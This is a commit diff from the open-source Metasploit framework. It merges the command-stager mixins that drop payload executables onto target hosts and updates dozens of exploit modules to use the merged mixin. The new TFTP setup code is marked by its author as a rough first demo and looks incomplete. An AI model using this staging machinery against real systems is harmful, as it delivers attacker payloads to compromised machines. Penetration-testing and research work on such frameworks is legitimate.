Use One CMDStagermixin

lib/msf/core/exploit/cmd_stager/multi.rb

@@ -1,97 +0,0 @@
-# -*- coding: binary -*-
-
-require 'msf/core/exploit/cmdstager'
-
-module Msf
-
-###
-#
-# This mixin provides an interface for staging cmd to arbitrary payloads
-#
-###
-module Exploit::CmdStager::Multi
-
-  include Msf::Exploit::CmdStager
-
-  def initialize(info = {})
-    super
-
-    register_advanced_options(
-      [
-        OptString.new('CMDSTAGER::DECODERSTUB',  [ false, 'The decoder stub to use.', nil]),
-      ], self.class)
-  end
-
-  def create_stager(exe, opts)
-    case opts[:flavor]
-    when :bourne
-      return Rex::Exploitation::CmdStagerBourne.new(exe)
-    when :debug_asm
-      return Rex::Exploitation::CmdStagerDebugAsm.new(exe)
-    when :debug_write
-      return Rex::Exploitation::CmdStagerDebugWrite.new(exe)
-    when :echo
-      return Rex::Exploitation::CmdStagerEcho.new(exe)
-    when :printf
-      return Rex::Exploitation::CmdStagerPrintf.new(exe)
-    when :vbs, :vbs_adodb
-      return Rex::Exploitation::CmdStagerVBS.new(exe)
-    end
-  end
-
-  def execute_cmdstager(opts = {})
-    if not opts.include?(:flavor)
-      default_flavor = guess_flavor
-      vprint_status("Using default stager: #{default_flavor}")
-      opts[:flavor] = default_flavor
-    end
-
-    if not opts.include?(:decoder)
-      opts[:decoder] = datastore['CMDSTAGER::DECODERSTUB'] || guess_decoder(opts)
-    end
-
-    super
-  end
-
-  def generate_cmdstager(opts = {}, pl = nil)
-    if not opts.include?(:decoder)
-      opts[:decoder] = datastore['CMDSTAGER::DECODERSTUB'] || guess_decoder(opts)
-    end
-
-    super
-  end
-
-  def guess_decoder(opts)
-    case opts[:flavor]
-    when :debug_asm
-      return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm")
-    when :debug_write
-      return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write")
-    when :vbs
-      return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")
-    when :vbs_adodb
-      return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")
-    end
-    return nil
-  end
-
-  def guess_flavor
-    c_platform = nil
-    if target_platform.names.length == 1
-      c_platform = target_platform.names.first
-    end
-    case c_platform
-    when 'linux', 'Linux'
-      return :bourne
-    when 'osx', 'OSX'
-      return :bourne
-    when 'unix', 'Unix'
-      return :bourne
-    when 'win', 'Windows'
-      return :vbs
-    end
-    return nil
-  end
-end
-
-end

lib/msf/core/exploit/cmd_stager/tftp.rb

@@ -1,67 +0,0 @@
-# -*- coding: binary -*-
-
-require 'rex/text'
-require 'msf/core/exploit/tftp'
-require 'msf/core/exploit/cmdstager'
-
-module Msf
-
-###
-#
-# This mixin provides an interface for staging cmd to arbitrary payloads
-#
-###
-module Exploit::CmdStager::TFTP
-
-  include Msf::Exploit::CmdStager
-  include Msf::Exploit::TFTPServer
-
-  def initialize(info = {})
-    super
-
-    register_advanced_options(
-      [
-        OptString.new( 'TFTPHOST',  [ false, 'The address of the machine hosting the file via TFTP.' ]),
-        OptString.new( 'TFTPRSRC',  [ false, 'The filename of the TFTP-hosted resource.' ]),
-      ], self.class)
-  end
-
-  def create_stager(exe, opts)
-    Rex::Exploitation::CmdStagerTFTP.new(exe)
-  end
-
-  def execute_cmdstager(opts = {})
-    tftphost = datastore['TFTPHOST']
-    tftphost ||= datastore['SRVHOST']
-    tftphost ||= datastore['LHOST']
-
-    @exe_tag = datastore['TFTPRSRC']
-    @exe_tag ||= Rex::Text.rand_text_alphanumeric(8)
-
-    opts.merge!({ :tftphost => tftphost, :transid => @exe_tag })
-
-    super
-  end
-
-  #
-  # Start the service and register the file
-  #
-  def execute_cmdstager_begin(opts)
-    start_service(@exe_tag, @exe)
-  end
-
-  #
-  # Stop the service
-  #
-  def execute_cmdstager_end(opts)
-    stop_service
-  end
-
-  def payload_exe
-    return nil if not @stager_instance
-    @stager_instance.payload_exe
-  end
-
-end
-
-end

lib/msf/core/exploit/cmdstager.rb

@@ -19,8 +19,12 @@ module Exploit::CmdStager
   #
   def initialize(info = {})
     super
-    @cmd_list = nil
     @stager_instance = nil
+
+    register_advanced_options(
+      [
+        OptString.new('CMDSTAGER::DECODERSTUB',  [ false, 'The decoder stub to use.', nil]),
+      ], self.class)
   end
 
 
@@ -28,29 +32,49 @@ module Exploit::CmdStager
   # Execute the command stager while showing the progress
   #
   def execute_cmdstager(opts = {})
-    cmd_list = generate_cmdstager(opts)
 
-    execute_cmdstager_begin(opts)
-
-    sent = 0
-    total_bytes = 0
-    cmd_list.each { |cmd| total_bytes += cmd.length }
-
-    delay = opts[:delay]
-    delay ||= 0.25
-
-    cmd_list.each do |cmd|
-      execute_command(cmd, opts)
-      sent += cmd.length
-
-      # In cases where a server has multiple threads, we want to be sure that
-      # commands we execute happen in the correct (serial) order.
-      ::IO.select(nil, nil, nil, delay)
-
-      progress(total_bytes, sent)
+    # Starts select the correct stager
+    unless opts.include?(:flavor)
+      default_flavor = guess_flavor
+      vprint_status("Using default stager: #{default_flavor}")
+      opts[:flavor] = default_flavor
     end
 
-    execute_cmdstager_end(opts)
+    unless opts.include?(:decoder)
+      opts[:decoder] = datastore['CMDSTAGER::DECODERSTUB'] || guess_decoder(opts)
+    end
+    # Ends select the correct stager
+
+    cmd_list = generate_cmdstager(opts)
+
+    @stager_instance.setup(self)
+
+    begin
+      execute_cmdstager_begin(opts)
+
+
+      sent = 0
+      total_bytes = 0
+      cmd_list.each { |cmd| total_bytes += cmd.length }
+
+      delay = opts[:delay]
+      delay ||= 0.25
+
+      cmd_list.each do |cmd|
+        execute_command(cmd, opts)
+        sent += cmd.length
+
+        # In cases where a server has multiple threads, we want to be sure that
+        # commands we execute happen in the correct (serial) order.
+        ::IO.select(nil, nil, nil, delay)
+
+        progress(total_bytes, sent)
+      end
+
+      execute_cmdstager_end(opts)
+    ensure
+      @stager_instance.teardown
+    end
   end
 
 
@@ -59,11 +83,18 @@ module Exploit::CmdStager
   # and operating system.
   #
   def generate_cmdstager(opts = {}, pl = nil)
+
+    # starts Multi task
+    unless opts.include?(:decoder)
+      opts[:decoder] = datastore['CMDSTAGER::DECODERSTUB'] || guess_decoder(opts)
+    end
+    # ends Multi task
+
     pl ||= payload.encoded
 
     @exe = generate_payload_exe
 
-    @stager_instance = create_stager(@exe, opts)
+    @stager_instance = create_stager(opts)
     cmd_list = @stager_instance.generate(opts)
 
     if (cmd_list.nil? or cmd_list.length < 1)
@@ -84,6 +115,57 @@ module Exploit::CmdStager
     print_status("Command Stager progress - %7s done (%d/%d bytes)" % [percent, sent, total])
   end
 
+  def create_stager(opts)
+    case opts[:flavor]
+    when :bourne
+      return Rex::Exploitation::CmdStagerBourne.new(@exe)
+    when :debug_asm
+      return Rex::Exploitation::CmdStagerDebugAsm.new(@exe)
+    when :debug_write
+      return Rex::Exploitation::CmdStagerDebugWrite.new(@exe)
+    when :echo
+      return Rex::Exploitation::CmdStagerEcho.new(@exe)
+    when :printf
+      return Rex::Exploitation::CmdStagerPrintf.new(@exe)
+    when :vbs, :vbs_adodb
+      return Rex::Exploitation::CmdStagerVBS.new(@exe)
+    when :tftp
+      return Rex::Exploitation::CmdStagerTFTP.new(@exe)
+    end
+  end
+
+  def guess_decoder(opts)
+    case opts[:flavor]
+    when :debug_asm
+      return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm")
+    when :debug_write
+      return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write")
+    when :vbs
+      return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")
+    when :vbs_adodb
+      return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")
+    end
+    return nil
+  end
+
+  def guess_flavor
+    c_platform = nil
+    if target_platform.names.length == 1
+      c_platform = target_platform.names.first
+    end
+    case c_platform
+    when 'linux', 'Linux'
+      return :bourne
+    when 'osx', 'OSX'
+      return :bourne
+    when 'unix', 'Unix'
+      return :bourne
+    when 'win', 'Windows'
+      return :vbs
+    end
+    return nil
+  end
+
   #
   # Methods to override - not used internally
   #

lib/rex/exploitation/cmdstager/base.rb

@@ -172,6 +172,19 @@ class CmdStagerBase
     nil
   end
 
+  # Should be overriden if the cmd stager needs to setup anything
+  # before it's executed
+  def setup(mod)
+
+  end
+
+  #
+  # Should be overriden if the cmd stager needs to do any clenaup
+  #
+  def teardown
+
+  end
+
 end
 end
 end

lib/rex/exploitation/cmdstager/tftp.rb

@@ -27,7 +27,6 @@ class CmdStagerTFTP < CmdStagerBase
 
   def initialize(exe)
     super
-
     @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
   end
 
@@ -51,11 +50,23 @@ class CmdStagerTFTP < CmdStagerBase
     super
   end
 
+  def setup_stager(mod)
+    tftp = Rex::Proto::TFTP::Server.new
+    tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
+    tftp.start
+    mod.add_socket(tftp) # Hating myself for doing it... but it's just a first demo
+  end
+
+  def teardown_stager
+    tftp.stop
+  end
+
   # NOTE: We don't use a concatenation operator here since we only have a couple commands.
   # There really isn't any need to combine them. Also, the ms01_026 exploit depends on
   # the start command being issued separately so that it can ignore it :)
-
+  attr_reader :exe
   attr_reader :payload_exe
+  attr_accessor :tftp
 end
 end
 end

modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb

@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,

modules/exploits/multi/http/hp_sys_mgmt_exec.rb

@@ -8,7 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info={})
@@ -193,6 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exploit
     @cookie = ''
+
     setup_stager
   end
 end

modules/exploits/multi/http/hyperic_hq_script_console.rb

@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,

modules/exploits/multi/http/jenkins_script_console.rb

@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = GoodRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,

modules/exploits/multi/http/netwin_surgeftp_exec.rb

@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = GoodRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,

modules/exploits/multi/http/struts_code_exec.rb

@@ -8,7 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = GoodRanking
 
-  include Msf::Exploit::CmdStagerTFTP
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -88,10 +88,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def windows_stager
-    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
-
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.'})
+    execute_cmdstager({ :temp => '.', :flavor => :tftp})
     @payload_exe = payload_exe
 
     print_status("Attempting to execute the payload...")

modules/exploits/multi/http/struts_code_exec_exception_delegator.rb

@@ -8,7 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::CmdStagerTFTP
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
     exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
 
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.'})
+    execute_cmdstager({ :temp => '.', :flavor => :tftp})
     @payload_exe = payload_exe
 
     print_status("Attempting to execute the payload...")

modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb

@@ -12,7 +12,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 

modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb

@@ -26,7 +26,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
   Rank = GreatRanking
 
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::EXE
   include Msf::Exploit::Remote::HttpClient
 

modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb

@@ -26,7 +26,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
   Rank = GreatRanking
 
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::EXE
   include Msf::Exploit::Remote::HttpClient
 

modules/exploits/multi/ssh/sshexec.rb

@@ -9,7 +9,7 @@ require 'net/ssh'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ManualRanking
 
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
 
   attr_accessor :ssh_socket
 

modules/exploits/unix/webapp/zeroshell_exec.rb

@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::EXE
 
   def initialize(info={})

modules/exploits/windows/antivirus/ams_hndlrsvc.rb

@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
 
-  include Msf::Exploit::CmdStagerTFTP
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
@@ -50,11 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def windows_stager
-
-    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
-
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.'})
+    execute_cmdstager({ :temp => '.', :flavor => :tftp})
     @payload_exe = payload_exe
 
     print_status("Attempting to execute the payload...")

modules/exploits/windows/antivirus/ams_xfr.rb

@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
 
-  include Msf::Exploit::CmdStagerTFTP
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
     exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
 
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.'})
+    execute_cmdstager({ :temp => '.', :flavor => :tftp})
     @payload_exe = payload_exe
 
     print_status("Attempting to execute the payload...")

modules/exploits/windows/browser/dxstudio_player_exec.rb

@@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,

modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb

@@ -8,7 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::CmdStagerTFTP
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -52,11 +52,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def windows_stager
-
-    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
-
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.'})
+    execute_cmdstager({ :temp => '.', :flavor => :tftp})
     @payload_exe = payload_exe
 
     print_status("Attempting to execute the payload...")

modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb

@@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
   HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget'  => 0,
       'DefaultOptions'  =>
         {
-          'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
+          'CMDSTAGER::DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
         },
       'DisclosureDate' => 'Jul 29 2013'))
 

modules/exploits/windows/http/osb_uname_jlist.rb

@@ -8,7 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::CmdStagerTFTP
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -53,11 +53,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def windows_stager
-
-    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
-
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.'})
+    execute_cmdstager({ :temp => '.', :flavor => :tftp})
     @payload_exe = payload_exe
 
     print_status("Attempting to execute the payload...")

modules/exploits/windows/http/sap_configservlet_exec_noauth.rb

@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit
   Rank = GreatRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})

modules/exploits/windows/iis/ms01_026_dbldecode.rb

@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
   # NOTE: This cannot be an HttpClient module since the response from the server
   # is not a valid HttpResponse
   include Msf::Exploit::Remote::Tcp
-  include Msf::Exploit::CmdStagerTFTP
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -191,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     # Use the CMD stager to get a payload running
-    execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
+    execute_cmdstager({:temp => '.', :linemax => 1400, :cgifname => exe_fname, :flavor => :tftp})
 
     # Save these file names for later deletion
     @exe_cmd_copy = exe_fname

modules/exploits/windows/iis/msadc.rb

@@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerTFTP
+  include Msf::Exploit::CmdStager
 
   def initialize
     super(
@@ -327,7 +327,7 @@ class Metasploit3 < Msf::Exploit::Remote
       res = exec_cmd(y, "cmd /c copy cmd.exe \\inetpub\\scripts\\#{exe_fname}", z)
 
       # Use the CMD stager to get a payload running
-      execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
+      execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname, :flavor => :tftp })
 
       # Save these file names for later deletion
       @exe_cmd_copy = exe_fname

modules/exploits/windows/mssql/mssql_linkcrawler.rb

@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::MSSQL
   include Msf::Auxiliary::Report
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,

modules/exploits/windows/mssql/mssql_payload.rb

@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::MSSQL
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
   #include Msf::Exploit::CmdStagerDebugAsm
   #include Msf::Exploit::CmdStagerDebugWrite
   #include Msf::Exploit::CmdStagerTFTP

modules/exploits/windows/mssql/mssql_payload_sqli.rb

@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::MSSQL_SQLI
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,

modules/exploits/windows/mysql/mysql_payload.rb

@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::MYSQL
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(

modules/exploits/windows/oracle/extjob.rb

@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::SMB
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,

modules/exploits/windows/winrm/winrm_script_exec.rb

@@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ManualRanking
 
   include Msf::Exploit::Remote::WinRM
-  include Msf::Exploit::CmdStagerMulti
+  include Msf::Exploit::CmdStager
 
 
   def initialize(info = {})
@@ -41,6 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
           'WfsDelay'     => 30,
           'EXITFUNC' => 'thread',
           'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
+          'CMDSTAGER::DECODERSTUB' => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_sleep")
         },
       'Platform'       => 'win',
       'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
@@ -60,11 +61,6 @@ class Metasploit3 < Msf::Exploit::Remote
       ], self.class
     )
 
-    register_advanced_options(
-    [
-      OptString.new( 'DECODERSTUB',  [ true, 'The VBS base64 file decoder stub to use.',
-        File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_sleep")]),
-    ], self.class)
     @compat_mode = false
   end